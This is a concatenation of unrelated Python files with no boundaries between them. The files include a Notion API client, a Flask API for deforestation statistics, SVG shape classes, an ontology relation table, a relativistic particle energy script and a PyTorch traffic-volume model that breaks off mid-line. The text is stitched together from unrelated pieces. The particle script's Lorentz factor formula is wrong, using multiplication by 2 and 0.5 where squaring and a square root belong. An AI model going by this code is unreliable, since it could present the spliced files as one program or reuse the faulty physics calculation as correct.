print("pmemCount",pmemCount) # print("xmemCount",xmemCount) # print("ymemCount",ymemCount) with open("dsp_fw.bin", "wb") as myfile, open("dsp_padded.bin", "rb") as file2, open("dsp_mem.bin", "rb") as file3: myfile.write(file2.read()) myfile.write(file3.read()) myfile.close() file2.close()notion_client/client.py """Synchronous and asynchronous clients for Notion's API.""" import logging from abc import abstractclassmethod from dataclasses import dataclass from types import TracebackType from typing import Any, Dict, List, Optional, Type, Union import httpx from httpx import Request, Response from notion_client.api_endpoints import ( BlocksEndpoint, DatabasesEndpoint, PagesEndpoint, SearchEndpoint, UsersEndpoint, ) from notion_client.errors import ( APIResponseError, HTTPResponseError, RequestTimeoutError, is_api_error_code, ) from notion_client.logging import make_console_logger from notion_client.typing import SyncAsync @dataclass class ClientOptions: """Options to configure the client. Attributes: auth: Bearer token for authentication. If left undefined, the `auth` parameter should be set on each request. timeout_ms: Number of milliseconds to wait before emitting a `RequestTimeoutError`. base_url: The root URL for sending API requests. This can be changed to test with a mock server. log_level: Verbosity of logs the instance will produce. By default, logs are written to `stdout`. logger: A custom logger. notion_version: Notion version to use. 
""" auth: Optional[str] = None timeout_ms: int = 60_000 base_url: str = "https://api.notion.com" log_level: int = logging.WARNING logger: Optional[logging.Logger] = None notion_version: str = "2021-08-16" class BaseClient: def __init__( self, client: Union[httpx.Client, httpx.AsyncClient], options: Optional[Union[Dict[str, Any], ClientOptions]] = None, **kwargs: Any, ) -> None: if options is None: options = ClientOptions(**kwargs) elif isinstance(options, dict): options = ClientOptions(**options) self.logger = options.logger or make_console_logger() self.logger.setLevel(options.log_level) self.options = options self._clients: List[Union[httpx.Client, httpx.AsyncClient]] = [] self.client = client self.blocks = BlocksEndpoint(self) self.databases = DatabasesEndpoint(self) self.users = UsersEndpoint(self) self.pages = PagesEndpoint(self) self.search = SearchEndpoint(self) @property def client(self) -> Union[httpx.Client, httpx.AsyncClient]: return self._clients[-1] @client.setter def client(self, client: Union[httpx.Client, httpx.AsyncClient]) -> None: client.base_url = httpx.URL(self.options.base_url + "/v1/") client.timeout = httpx.Timeout(timeout=self.options.timeout_ms / 1_000) client.headers = httpx.Headers( { "Notion-Version": self.options.notion_version, "User-Agent": "ramnes/notion-sdk-py@0.7.1", } ) if self.options.auth: client.headers["Authorization"] = f"Bearer {self.options.auth}" self._clients.append(client) def _build_request( self, method: str, path: str, query: Optional[Dict[Any, Any]] = None, body: Optional[Dict[Any, Any]] = None, auth: Optional[str] = None, ) -> Request: headers = httpx.Headers() if auth: headers["Authorization"] = f"Bearer {auth}" self.logger.info(f"{method} {self.client.base_url}{path}") self.logger.debug(f"=> {query} -- {body}") return self.client.build_request( method, path, params=query, json=body, headers=headers ) def _parse_response(self, response: Response) -> Any: try: response.raise_for_status() except httpx.TimeoutException: raise RequestTimeoutError() except httpx.HTTPStatusError as error: body = error.response.json() code = body.get("code") if code and is_api_error_code(code): raise APIResponseError(response, body["message"], code) raise HTTPResponseError(error.response) body = response.json() self.logger.debug(f"=> {body}") return body @abstractclassmethod def request( self, path: str, method: str, query: Optional[Dict[Any, Any]] = None, body: Optional[Dict[Any, Any]] = None, auth: Optional[str] = None, ) -> SyncAsync[Any]: # noqa pass class Client(BaseClient): """Synchronous client for Notion's API.""" client: httpx.Client def __init__( self, options: Optional[Union[Dict[Any, Any], ClientOptions]] = None, client: Optional[httpx.Client] = None, **kwargs: Any, ) -> None: if client is None: client = httpx.Client() super().__init__(client, options, **kwargs) def __enter__(self) -> "Client": self.client = httpx.Client() self.client.__enter__() return self def __exit__( self, exc_type: Type[BaseException], exc_value: BaseException, traceback: TracebackType, ) -> None: self.client.__exit__(exc_type, exc_value, traceback) del self._clients[-1] def close(self) -> None: """Close the connection pool of the current inner client.""" self.client.close() def request( self, path: str, method: str, query: Optional[Dict[Any, Any]] = None, body: Optional[Dict[Any, Any]] = None, auth: Optional[str] = None, ) -> Any: """Send an HTTP request.""" request = self._build_request(method, path, query, body, auth) response = self.client.send(request) return 
self._parse_response(response) class AsyncClient(BaseClient): """Asynchronous client for Notion's API.""" client: httpx.AsyncClient def __init__( self, options: Optional[Union[Dict[str, Any], ClientOptions]] = None, client: Optional[httpx.AsyncClient] = None, **kwargs: Any, ) -> None: if client is None: client = httpx.AsyncClient() super().__init__(client, options, **kwargs) async def __aenter__(self) -> "AsyncClient": self.client = httpx.AsyncClient() await self.client.__aenter__() return self async def __aexit__( self, exc_type: Type[BaseException], exc_value: BaseException, traceback: TracebackType, ) -> None: await self.client.__aexit__(exc_type, exc_value, traceback) del self._clients[-1] async def aclose(self) -> None: """Close the connection pool of the current inner client.""" await self.client.aclose() async def request( self, path: str, method: str, query: Optional[Dict[Any, Any]] = None, body: Optional[Dict[Any, Any]] = None, auth: Optional[str] = None, ) -> Any: """Send an HTTP request asynchronously.""" request = self._build_request(method, path, query, body, auth) response = await self.client.send(request) return self._parse_response(response) ImazonSadGoogle/DeforestationAnalysisTool #encoding: utf-8 import time import csv from datetime import datetime, timedelta, date import random import logging import simplejson as json from StringIO import StringIO from time_utils import timestamp, first_of_current_month, past_month_range from dateutil.parser import parse from google.appengine.ext.db import Key from flask import jsonify, request, abort, Response from app import app import settings from report_types import ReportType, CSVReportType, KMLReportType from kml import path_to_kml from models import Area, Note, Report, StatsStore, FustionTablesNames from ee import NDFI, EELandsat, Stats from resources.report import ReportAPI, CellAPI, NDFIMapApi, PolygonAPI, NoteAPI, UserAPI from resources.stats import RegionStatsAPI from application.constants import amazon_bounds ReportAPI.add_urls(app, '/api/v0/report') ReportAPI.add_custom_url(app, '/api/v0/report//close', 'close', ("POST",)) CellAPI.add_urls(app, '/api/v0/report//cell') CellAPI.add_custom_url(app, '/api/v0/report//cell//children', 'children') CellAPI.add_custom_url(app, '/api/v0/report//cell//ndfi_change', 'ndfi_change') CellAPI.add_custom_url(app, '/api/v0/report//cell//bounds', 'bounds') CellAPI.add_custom_url(app, '/api/v0/report//cell//landsat', 'landsat') CellAPI.add_custom_url(app, '/api/v0/report//cell//rgb///', 'rgb_mapid') NDFIMapApi.add_urls(app, '/api/v0/report//map') PolygonAPI.add_urls(app, '/api/v0/report//cell//polygon') NoteAPI.add_urls(app, '/api/v0/report//cell//note') UserAPI.add_urls(app, '/api/v0/user') RegionStatsAPI.add_urls(app, '/api/v0/report//stats') RegionStatsAPI.add_custom_url(app, '/api/v0/stats/polygon', 'polygon', methods=('POST',)) #TODO: this function needs a huge refactor @app.route('/api/v0/stats///') @app.route('/api/v0/stats/
    /') @app.route('/api/v0/stats/
    ') def stats(table, zone=None, format="csv"): reports = request.args.get('reports', None) if not reports: abort(400) try: reports = map(int, reports.split(',')) except ValueError: logging.error("bad format for report id") abort(400) this_report = ReportType.factory(format) this_report.init(zone) this_report.write_header() logging.info("table id is %s ", table) logging.info("and we see %s ", FustionTablesNames.all().filter('table_id =', table).fetch(1)) logging.info("and zone %s ", zone) logging.info("and format %s ", format) reports = [Report.get_by_id(x) for x in reports] for r in reports: if not r: logging.error("report not found") abort(404) stats = this_report.get_stats(r, table) for s in stats: this_report.write_row(r, s, table) this_report.write_footer() return this_report.response("report_%s" % table) @app.route('/api/v0/stats/polygon/') def polygon_stats(format=None): reports = request.args.get('reports', None) if not reports: abort(400) try: reports = map(int, reports.split(',')) except ValueError: logging.error("bad format for report id") abort(400) try: reports = [Report.get_by_id(x) for x in reports] except ValueError: logging.error("can't find some report") abort(404) #TODO: test if polygon is ccw # exchange lat, lon -> lon, lat polygon = json.loads(request.args.get('polygon', None)) polygon.append(polygon[0]) if not polygon: abort(404) ee = Stats() normalized_poly = [(coord[1], coord[0]) for coord in polygon] stats = ee.get_stats_for_polygon([(str(r.key().id()), r.assetid) for r in reports], [normalized_poly]) this_report = ReportType.factory(format) this_report.init("custom polygon") try: this_report.write_header() for i,s in enumerate(stats): r = reports[i] this_report.write_row(r, s, None, path_to_kml([polygon])) this_report.write_footer() return this_report.response("report_polygon") except (KeyError, ValueError, IndexError): abort(404) def landstat(): e = EELandsat('LANDSAT/L7_L1T') #return jsonify(images=e.list()) return jsonify(map=e.mapid()) @app.route('/api/v0/test') def testing(): """ r = Report.current() #r = Report.get(Key('')) logging.info("report " + unicode(r)) ee_resource = 'MOD09GA' s = Stats() polygon = [[[-61.9,-11.799],[-61.9,-11.9],[-61.799,-11.9],[-61.799,-11.799],[-61.9,-11.799]]] return str(s.get_stats_for_polygon("PRODES_2009", polygon)) #return str(ndfi.mapid2()) #return str(ndfi.freeze_map(1089491, r.key().id())) """ s = Stats() return jsonify(s._execute_cmd("/value", { "image": json.dumps({"creator":"SAD/com.google.earthengine.examples.sad.GetStatsList","args":[ [{"creator":"SAD/com.google.earthengine.examples.sad.ProdesImage","args":["PRODES_2009"]}, {"creator":"SAD/com.google.earthengine.examples.sad.ProdesImage","args":["PRODES_IMAZON_2011a"]}],{"type":"FeatureCollection","table_id":1505198},"name"]}), "fields": "classHistogram"})) import sys import json import argparse import logging from .tool import ToolBase, ToolHelper logger = logging.getLogger(__name__) class Register(ToolBase): name = 'register' desc = 'Register external asd tools package' def register(self, parser): parser.add_argument('name', help = 'The name of the python package') def process(self, args): ToolHelper.register_external_tools_module(args.name) print 'Tools registered successfully' import sys ''' The zodbpickle.pickle module exposes the standard behavior of the pickle module. This is backward compatible, but has the effect that by default, on Python3 you get the fast implementation, while on Python2 you get the slow implementation. 
This module is a version that always exposes the fast implementation of pickling and avoids the need to explicitly touch internals. ''' ''' Note: We are intentionally using "import *" in this context. The imported modules define an __all__ variable, which contains all the names that it wants to export. So this is a rare case where 'import *' is exactly the right thing to do. ''' # pick up all names that the module defines if sys.version_info[0] >= 3: from .pickle_3 import * # do not share the globals with a slow version del sys.modules['zodbpickle.pickle_3'] else: from .pickle_2 import * # also make sure that we really have the fast version, although # python3 tries to import them by default from ._pickle import * del sys nairoukh-code/Python_Projectsmaze_solver/test_maze.py # test_maze from unittest import TestCase from maze_solver.maze import MazeSolver class TestMazeSolver(TestCase): def test_solve(self): test_maze = [ ['A', 'X', ' ', ' ', ' '], [' ', 'X', ' ', 'X', ' '], [' ', ' ', ' ', ' ', ' '], [' ', 'X', ' ', 'X', ' '], [' ', 'X', ' ', 'X', 'B'], ] maze_solver = MazeSolver(test_maze) self.assertEqual(maze_solver.solve(), "SSEEEESS")# -*- coding: utf-8 -*- ## THESE PROGRAMS ALLOW YOU TO CALCULATE ## THE ENERGY OF A LIQUID, PARTICULE ## AND MAYBE SOME OTHERS THINGS NOT CODED YET ##LICENSE : DO WHAT THE FUCK YOU WANT ## ./particle.py argv1 argv2 --> argv1: speed particle && argv2: particle's mass import sys,math args=len(sys.argv) if args != 3: print("There isn't enough or too much arguments.\ \nYou have to give exactly two arguments.\n\n\ The first argument is the speed of the particle\n\ And the second argument is the mass of the particle.\ \nExiting...") sys.exit() pass def lorentzian_factor(v, c): y=1/(((1-v*2)/(c*2))*0.5) return float(y) pass def impulsion(y,m,v): p=y*m*v return float(p) pass def energy_computing(m, c, p): m=math.pow(m, 2) cc=math.pow(c, 4) pp=math.pow(p, 2) c=math.pow(c, 2) EE=((m*cc)+pp*c) EE=float(EE) return EE pass v=float(sys.argv[1]) #v is the speed of the particle m=float(sys.argv[2]) #mass of the particle c=float(299792458) #Fiat lux! y=lorentzian_factor(v,c) y=float(y) print("The lorentzian factor is : " + str(y)) p=impulsion(y,m,v) print("The impulsion is : " + str(p)) energy=energy_computing(m,c,p) print("E²=" + str(energy) + "") print("Therefore, we have :\n\ E="+ str(math.sqrt(float(energy)))) sys.exit() from .model import load_model, Model, info def run(CONFIG): n_class = len(CONFIG['PERSONS']) + 1 info("Start Modelling Process..") model = Model(n_class) model.train_and_evaluate(CONFIG)from arc_to_cubic import arc_to_cubic import dataclasses import svg_meta from svg_path_iter import SVGPathIter @dataclasses.dataclass class Point: x: int = 0 y: int = 0 # Subset of https://www.w3.org/TR/SVG11/painting.html @dataclasses.dataclass class SVGShape: clip_path: str = '' fill: str = '' stroke: str = '' # https://www.w3.org/TR/SVG11/paths.html#PathElement # Iterable, returning each command in the path. 
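# SVGPath accumulates its 'd' attribute through the M/m, L/l, A/a, H/h, V/v helpers
# below, and walk() re-emits each command through a callback; move(), absolute(),
# explicit_lines() and arcs_to_cubics() are all built on that walk. A rough usage
# sketch, using only names defined in this module (the exact spacing of d depends on
# svg_meta.path_segment):
#   p = SVGPath()
#   p.M(0, 0); p.L(10, 0); p.end()
#   p.absolute(inplace=True)  # rewrite d in place using absolute commands only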
@dataclasses.dataclass class SVGPath(SVGShape): d: str = '' def __init__(self, **kwargs): for name, value in kwargs.items(): setattr(self, name, value) def _add(self, path_snippet): if self.d: self.d += ' ' self.d += path_snippet def _add_cmd(self, cmd, *args): self._add(svg_meta.path_segment(cmd, *args)) def M(self, *args): self._add_cmd('M', *args) def m(self, *args): self._add_cmd('m', *args) def _arc(self, c, rx, ry, x, y, large_arc): self._add(svg_meta.path_segment(c, rx, ry, 0, large_arc, 1, x, y)) def A(self, rx, ry, x, y, large_arc=0): self._arc('A', rx, ry, x, y, large_arc) def a(self, rx, ry, x, y, large_arc=0): self._arc('a', rx, ry, x, y, large_arc) def H(self, *args): self._add_cmd('H', *args) def h(self, *args): self._add_cmd('h', *args) def V(self, *args): self._add_cmd('V', *args) def v(self, *args): self._add_cmd('v', *args) def L(self, *args): self._add_cmd('L', *args) def l(self, *args): self._add_cmd('L', *args) def end(self): self._add('z') def as_path(self) -> 'SVGPath': return self def element(self): return _data_to_el(self) def __iter__(self): return SVGPathIter(self.d, exploded=True) def walk(self, callback): """Walk path and call callback to build potentially new commands. def callback(curr_xy, cmd, args) -> sequence of (new_cmd, new_args) """ # https://www.w3.org/TR/SVG11/paths.html curr_pos = Point() new_cmds = [] # iteration gives us exploded commands for idx, (cmd, args) in enumerate(self): svg_meta.check_cmd(cmd, args) if idx == 0 and cmd == 'm': cmd = 'M' for (new_cmd, new_cmd_args) in callback(curr_pos, cmd, args): new_cmds.append((new_cmd, new_cmd_args)) # update current position x_coord_idxs, y_coord_idxs = svg_meta.cmd_coords(new_cmd) if new_cmd.isupper(): if x_coord_idxs: curr_pos.x = 0 if y_coord_idxs: curr_pos.y = 0 if x_coord_idxs: curr_pos.x += new_cmd_args[x_coord_idxs[-1]] if y_coord_idxs: curr_pos.y += new_cmd_args[y_coord_idxs[-1]] self.d = '' for cmd, args in new_cmds: self._add_cmd(cmd, *args) # TODO replace with a proper transform def move(self, dx, dy, inplace=False): """Returns a new path that is this one shifted.""" def move_callback(_, cmd, args): # Paths must start with an absolute moveto. Relative bits are ... relative. # Shift the absolute parts and call it a day. 
if cmd.islower(): return ((cmd, args),) x_coord_idxs, y_coord_idxs = svg_meta.cmd_coords(cmd) args = list(args) # we'd like to mutate 'em for x_coord_idx in x_coord_idxs: args[x_coord_idx] += dx for y_coord_idx in y_coord_idxs: args[y_coord_idx] += dy return ((cmd, args),) target = self if not inplace: target = SVGPath(d=self.d, clip_path=self.clip_path) target.walk(move_callback) return target def absolute(self, inplace=False): """Returns equivalent path with only absolute commands.""" def abs_callback(curr_pos, cmd, args): x_coord_idxs, y_coord_idxs = svg_meta.cmd_coords(cmd) if cmd.islower(): cmd = cmd.upper() args = list(args) # we'd like to mutate 'em for x_coord_idx in x_coord_idxs: args[x_coord_idx] += curr_pos.x for y_coord_idx in y_coord_idxs: args[y_coord_idx] += curr_pos.y return ((cmd, args),) target = self if not inplace: target = SVGPath(self.d, self.clip_path) target.walk(abs_callback) return target def explicit_lines(self, inplace=False): """Replace all vertical/horizontal lines with line to (x,y).""" def explicit_line_callback(curr_pos, cmd, args): if cmd == 'v': args = (0, args[0]) elif cmd == 'V': args = (curr_pos.x, args[0]) elif cmd == 'h': args = (args[0], 0) elif cmd == 'H': args = (args[0], curr_pos.y) else: return ((cmd, args),) # nothing changes if cmd.islower(): cmd = 'l' else: cmd = 'L' return ((cmd, args),) target = self if not inplace: target = SVGPath(d=self.d, clip_path=self.clip_path) target.walk(explicit_line_callback) return target def arcs_to_cubics(self, inplace=False): """Replace all arcs with similar cubics""" def arc_to_cubic_callback(curr_pos, cmd, args): if cmd not in {'a', 'A'}: # no work to do return ((cmd, args),) (rx, ry, x_rotation, large, sweep, end_x, end_y) = args start_pt = (curr_pos.x, curr_pos.y) if cmd == 'a': end_x += curr_pos[0] end_y += curr_pos[1] end_pt = (end_x, end_y) result = [] for p1, p2, target in arc_to_cubic(start_pt, rx, ry, x_rotation, large, sweep, end_pt): x1, y1 = p1.real, p1.imag x2, y2 = p2.real, p2.imag x, y = target.real, target.imag result.append(('C', (x1, y1, x2, y2, x, y))) return tuple(result) target = self if not inplace: target = SVGPath(d=self.d, clip_path=self.clip_path) target.walk(arc_to_cubic_callback) return target # https://www.w3.org/TR/SVG11/shapes.html#CircleElement @dataclasses.dataclass class SVGCircle: r: float cx: float = 0 cy: float = 0 clip_path: str = '' def as_path(self) -> SVGPath: return SVGEllipse(self.r, self.r, self.cx, self.cy, self.clip_path).as_path() def element(self): return _data_to_el(self) # https://www.w3.org/TR/SVG11/shapes.html#EllipseElement @dataclasses.dataclass class SVGEllipse: rx: float ry: float cx: float = 0 cy: float = 0 clip_path: str = '' def as_path(self) -> SVGPath: rx, ry, cx, cy, clip_path = dataclasses.astuple(self) path = SVGPath() # arc doesn't seem to like being a complete shape, draw two halves path.M(cx - rx, cy) path.A(rx, ry, cx + rx, cy, large_arc=1) path.A(rx, ry, cx - rx, cy, large_arc=1) path.clip_path = clip_path return path def element(self): return _data_to_el(self) # https://www.w3.org/TR/SVG11/shapes.html#LineElement @dataclasses.dataclass class SVGLine: x1: float = 0 y1: float = 0 x2: float = 0 y2: float = 0 clip_path: str = '' def as_path(self) -> SVGPath: x1, y1, x2, y2, clip_path = dataclasses.astuple(self) path = SVGPath() path.M(x1, y1) path.L(x2, y2) path.clip_path = clip_path return path def element(self): return _data_to_el(self) # https://www.w3.org/TR/SVG11/shapes.html#PolygonElement @dataclasses.dataclass class SVGPolygon: points: 
str clip_path: str = '' def as_path(self) -> SVGPath: if self.points: path = SVGPath(d='M' + self.points + ' z') else: path = SVGPath() path.clip_path = self.clip_path return path def element(self): return _data_to_el(self) # https://www.w3.org/TR/SVG11/shapes.html#PolylineElement @dataclasses.dataclass class SVGPolyline: points: str clip_path: str = '' def as_path(self) -> SVGPath: if self.points: return SVGPath(d='M' + self.points) return SVGPath() def element(self): return _data_to_el(self) # https://www.w3.org/TR/SVG11/shapes.html#RectElement @dataclasses.dataclass class SVGRect: x: float = 0 y: float = 0 width: float = 0 height: float = 0 rx: float = 0 ry: float = 0 clip_path: str = '' def __post_init__(self): if not self.rx: self.rx = self.ry if not self.ry: self.ry = self.rx self.rx = min(self.rx, self.width / 2) self.ry = min(self.ry, self.height / 2) def as_path(self) -> SVGPath: x, y, w, h, rx, ry, clip_path = dataclasses.astuple(self) path = SVGPath() path.M(x + rx, y) path.H(x + w - rx) if rx > 0: path.A(rx, ry, x + w, y + ry) path.V(y + h - ry) if rx > 0: path.A(rx, ry, x + w - rx, y + h) path.H(x + rx) if rx > 0: path.A(rx, ry, x, y + h - ry) path.V(y + ry) if rx > 0: path.A(rx, ry, x + rx, y) path.end() path.clip_path = clip_path return path def element(self): return _data_to_el(self) ontobio/rdfgen/relations.py __relation_label_lookup = { "occurs in": "http://purl.obolibrary.org/obo/BFO_0000066", "happens during": "http://purl.obolibrary.org/obo/RO_0002092", "has input": "http://purl.obolibrary.org/obo/RO_0002233", "results in specification of": "http://purl.obolibrary.org/obo/RO_0002356", "part of": "http://purl.obolibrary.org/obo/BFO_0000050", "has part": "http://purl.obolibrary.org/obo/BFO_0000051", "results in development of": "http://purl.obolibrary.org/obo/RO_0002296", "results in movement of": "http://purl.obolibrary.org/obo/RO_0002565", "occurs at": "http://purl.obolibrary.org/obo/GOREL_0000501", "stabilizes": "http://purl.obolibrary.org/obo/GOREL_0000018", "positively regulates": "http://purl.obolibrary.org/obo/RO_0002213", "regulates transport of": "http://purl.obolibrary.org/obo/RO_0002011", "regulates transcription of": "http://purl.obolibrary.org/obo/GOREL_0098788", "causally upstream of": "http://purl.obolibrary.org/obo/RO_0002411", "regulates activity of": "http://purl.obolibrary.org/obo/GOREL_0098702", "adjacent to": "http://purl.obolibrary.org/obo/RO_0002220", "results in acquisition of features of": "http://purl.obolibrary.org/obo/RO_0002315", "results in morphogenesis of": "http://purl.obolibrary.org/obo/RO_0002298", "results in maturation of": "http://purl.obolibrary.org/obo/RO_0002299", "has participant": "http://purl.obolibrary.org/obo/RO_0000057", "transports or maintains localization of": "http://purl.obolibrary.org/obo/RO_0002313", "negatively regulates": "http://purl.obolibrary.org/obo/RO_0002212", "regulates": "http://purl.obolibrary.org/obo/RO_0002211", "regulates expression of": "http://purl.obolibrary.org/obo/GOREL_0098789", "has target end location": "http://purl.obolibrary.org/obo/RO_0002339", "produced by": "http://purl.obolibrary.org/obo/RO_0003001", "has end location": "http://purl.obolibrary.org/obo/RO_0002232", "directly positively regulates": "http://purl.obolibrary.org/obo/RO_0002629", "has direct input": "http://purl.obolibrary.org/obo/GOREL_0000752", "enables": "http://purl.obolibrary.org/obo/RO_0002327", "enabled by": "http://purl.obolibrary.org/obo/RO_0002333", "involved in": "http://purl.obolibrary.org/obo/RO_0002331", "acts 
upstream of": "http://purl.obolibrary.org/obo/RO_0002263", "colocalizes with": "http://purl.obolibrary.org/obo/RO_0002325", "contributes to": "http://purl.obolibrary.org/obo/RO_0002326", "acts upstream of or within": "http://purl.obolibrary.org/obo/RO_0002264", "acts upstream of or within positive effect": "http://purl.obolibrary.org/obo/RO_0004032", "acts upstream of or within negative effect": "http://purl.obolibrary.org/obo/RO_0004033", "acts upstream of negative effect": "http://purl.obolibrary.org/obo/RO_0004035", "acts upstream of positive effect": "http://purl.obolibrary.org/obo/RO_0004034", "located in": "http://purl.obolibrary.org/obo/RO_0001025", "is active in": "http://purl.obolibrary.org/obo/RO_0002432", } def lookup_label(label, default=None): return __relation_label_lookup.get(label.replace("_", " "), default) def label_relation_lookup(): return __relation_label_lookup Radar.py0 import pandas as pd import numpy as np import torch import torch.nn as nn from torch.utils.data import Dataset,DataLoader import torch.nn.functional as F import matplotlib.pyplot as plt from sklearn.preprocessing import MinMaxScaler df = pd.read_csv("Radar_Traffic_Counts.csv") df_new = df.copy() #Sortby date to get logical predictions df_new = df_new.sort_values(by = ["Year", "Month", "Day", "Day of Week"]) #Transform object data to integer classes mappings = {} for i in range(df_new.shape[1]): if df_new.iloc[:,i].dtypes == 'O': labels_list=list(df_new.iloc[:,i].unique()) mapping = dict(zip(labels_list,range(len(labels_list)))) mappings[df_new.columns[i]] = (mapping) df_new.iloc[:,i] = df_new.iloc[:,i].map(mapping) #divide data into features and labels X = df_new.drop("Volume", axis = 1) y = df_new.Volume scaler = MinMaxScaler() scaler.fit(np.array(y).reshape(-1,1)) y_scaled = scaler.transform(np.array(y).reshape(-1,1)) scaler = MinMaxScaler() scaler.fit(X) X_scaled = scaler.transform(X) #take a small part of data to accelerate computation X = X_scaled[:20000, :] y = y_scaled[:20000] X_train, X_test = X[:16000], X[16000:] y_train, y_test = y[:16000], y[16000:] #create a dataset class class SelectDataset(Dataset): def __init__(self,feature,target): self.feature = feature self.target = target def __len__(self): return len(self.feature) def __getitem__(self,idx): item = self.feature[idx] label = self.target[idx] return item,label #transform datasets into Pytorch tensors X_train, X_test = torch.tensor(X_train), torch.tensor(X_test) y_train, y_test = torch.tensor(y_train), torch.tensor(y_test) batch_size = 10 test = SelectDataset(X_test,y_test) train = SelectDataset(X_train, y_train) train_loader = DataLoader(train, batch_size = batch_size,shuffle = False) test_loader = DataLoader(test, batch_size = batch_size, shuffle = False) #Define a neural network class NN(nn.Module): def __init__(self): super(NN,self).__init__() self.fc1 = nn.Linear(11,5) self.fc2 = nn.Linear(5,5) self.fc3 = nn.Linear(5,1) def forward(self,x): x = self.fc1(x) x = self.fc2(x) x = self.fc3(x) return x #Define the model and the loss function and the functions for training and testing device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") model = NN().to(device) optimizer = torch.optim.Adam(model.parameters(), lr=1e-5) criterion = nn.MSELoss() train_losses = [] def Train(): running_loss = .0 model.train() for idx, (inputs,labels) in enumerate(train_loader): inputs = inputs.to(device) labels = labels.float().to(device) optimizer.zero_grad() preds = model(inputs.float()) loss = criterion(preds,labels) loss.backward() 
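# loss.backward() accumulates gradients on the model parameters; the optimizer.step()
# that follows applies the Adam update, which is why optimizer.zero_grad() is called at
# the top of every iteration.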
optimizer.step() running_loss += loss train_loss = running_loss/len(train_loader) train_losses.append(train_loss.detach().cpu().numpy()) print(f'train_loss {train_loss}') test_losses = [] def Test(): running_loss = .0 model.eval() with torch.no_grad(): for idx, (inputs, labels) in enumerate(test_loader): inputs = inputs.to(device) labels = labels.to(device) optimizer.zero_grad() preds = model(inputs.float()) loss = criterion(preds,labels) running_loss += loss test_loss = running_loss/len(test_loader) test_losses.append(test_loss.detach().cpu().numpy()) print(f'test_loss {test_loss}') #Do 500 epochs and see how the loss changes epochs = 300 for epoch in range(epochs): print('epochs {}/{}'.format(epoch+1,epochs)) Train() Test() #Plot the losses fig, ax = plt.subplots() color = "tab:blue" ax.plot(range(len(train_losses)), train_losses, color = color, label = "train loss") color = "tab:red" ax.plot(range(len(test_losses)), test_losses, color = color, label = "test loss") legend = ax.legend(loc='upper right', shadow=True, fontsize='x-large') plt.show #Now we're going to change the MSE loss to the Huber Loss model1 = NN().to(device) optimizer = torch.optim.Adam(model1.parameters(), lr=1e-5) criterion = nn.SmoothL1Loss() train_losses_huber = [] def Train_huber(): running_loss = .0 model1.train() for idx, (inputs,labels) in enumerate(train_loader): inputs = inputs.to(device) labels = labels.float().to(device) optimizer.zero_grad() preds = model1(inputs.float()) loss = criterion(preds,labels) loss.backward() optimizer.step() running_loss += loss train_loss = running_loss/len(train_loader) train_losses_huber.append(train_loss.detach().cpu().numpy()) print(f'train_loss {train_loss}') test_losses_huber = [] def Test_huber(): running_loss = .0 model1.eval() with torch.no_grad(): for idx, (inputs, labels) in enumerate(test_loader): inputs = inputs.to(device) labels = labels.to(device) optimizer.zero_grad() preds = model1(inputs.float()) loss = criterion(preds,labels) running_loss += loss test_loss = running_loss/len(test_loader) test_losses_huber.append(test_loss.detach().cpu().numpy()) print(f'test_loss {test_loss}') #Do 100 epochs using this new loss epochs = 300 for epoch in range(epochs): print('epochs {}/{}'.format(epoch+1,epochs)) Train_huber() Test_huber() #Now we define a convolutional neural network class CNN(nn.Module): def __init__(self): super(CNN,self).__init__() self.conv1d = nn.Conv1d(1,32,kernel_size= 3, stride = 1) self.relu = nn.ReLU(inplace = True) self.maxpool = nn.MaxPool1d(3, stride=1) self.fc1 = nn.Linear(7 * 32,50) self.fc2 = nn.Linear(50,1) def forward(self,x): x = self.conv1d(x) x = self.relu(x) x = self.maxpool(x) x = x.view(10,-1) x = self.fc1(x) x = self.relu(x) x = F.dropout(x, training=self.training) x = self.fc2(x) return x model_CNN = CNN().to(device) optimizer = torch.optim.Adam(model_CNN.parameters(), lr=1e-5) criterion = nn.SmoothL1Loss() train_losses_CNN = [] def Train_CNN(): running_loss = .0 model_CNN.train() for idx, (inputs,labels) in enumerate(train_loader): inputs = inputs.view(-1,1,11) inputs = inputs.to(device) labels = labels.float().to(device) optimizer.zero_grad() preds = model_CNN(inputs.float()) loss = criterion(preds,labels) loss.backward() optimizer.step() running_loss += loss train_loss = running_loss/len(train_loader) train_losses_CNN.append(train_loss.detach().cpu().numpy()) print(f'train_loss {train_loss}') test_losses_CNN = [] def Test_CNN(): running_loss = .0 model_CNN.eval() with torch.no_grad(): for idx, (inputs, labels) in 
enumerate(test_loader): inputs = inputs.view(-1,1,11) inputs = inputs.to(device) labels = labels.to(device) optimizer.zero_grad() preds = model_CNN(inputs.float()) loss = criterion(preds,labels) running_loss += loss test_loss = running_loss/len(test_loader) test_losses_CNN.append(test_loss.detach().cpu().numpy()) print(f'test_loss {test_loss}') epochs = 300 for epoch in range(epochs): print('epochs {}/{}'.format(epoch+1,epochs)) Train_CNN() Test_CNN() #Plot the losses fig, ax = plt.subplots(figsize = (10,8)) color = "tab:blue" ax.plot(range(len(train_losses_CNN)), train_losses_CNN, color = color, label = "train loss") color = "tab:red" ax.plot(range(len(test_losses_CNN)), test_losses_CNN, color = color, label = "test loss") ax.set_xlabel("Epochs") ax.set_ylabel("Losses") legend = ax.legend(loc='upper right', shadow=True, fontsize='x-large') plt.show #RNN #Reshape the data to use for RNNs and build the dataloaders X_train, X_test = X[:16000], X[16000:] y_train, y_test = y[:16000], y[16000:] X_train, X_test = X_train.view(-1,2,11), X_test.view(-1, 2, 11) y_train, y_test = y_train.view(-1, 2), y_test.view(-1,2) batch_size = 10 test = SelectDataset(X_test,y_test) train = SelectDataset(X_train, y_train) train_loader = DataLoader(train, batch_size = batch_size,shuffle = False) test_loader = DataLoader(test, batch_size = batch_size, shuffle = False) #Building RNN class RNN(nn.Module): def __init__(self, input_dim, hidden_dim, layer_dim, output_dim): super(RNN, self).__init__() self.hidden_dim = hidden_dim #hidden layer dimension self.layer_dim = layer_dim #number of hidden layers self.rnn = nn.RNN(input_dim, hidden_dim, layer_dim, batch_first=True, nonlinearity='relu') self.fc = nn.Linear(hidden_dim, output_dim) def forward(self, x): # Initialize hidden state with zeros h0 = torch.zeros(self.layer_dim, x.size(0), self.hidden_dim).requires_grad_().cuda() x, hn = self.rnn(x, h0.detach()) x = self.fc(x[:, -1, :]) #just want last time step hidden states return x #Train and test our model #Model parameters input_dim = 11 hidden_dim = 100 layer_dim = 1 output_dim = 2 model_RNN = RNN(input_dim, hidden_dim, layer_dim, output_dim).to(device) optimizer = torch.optim.Adam(model_RNN.parameters(), lr=1e-5) criterion = 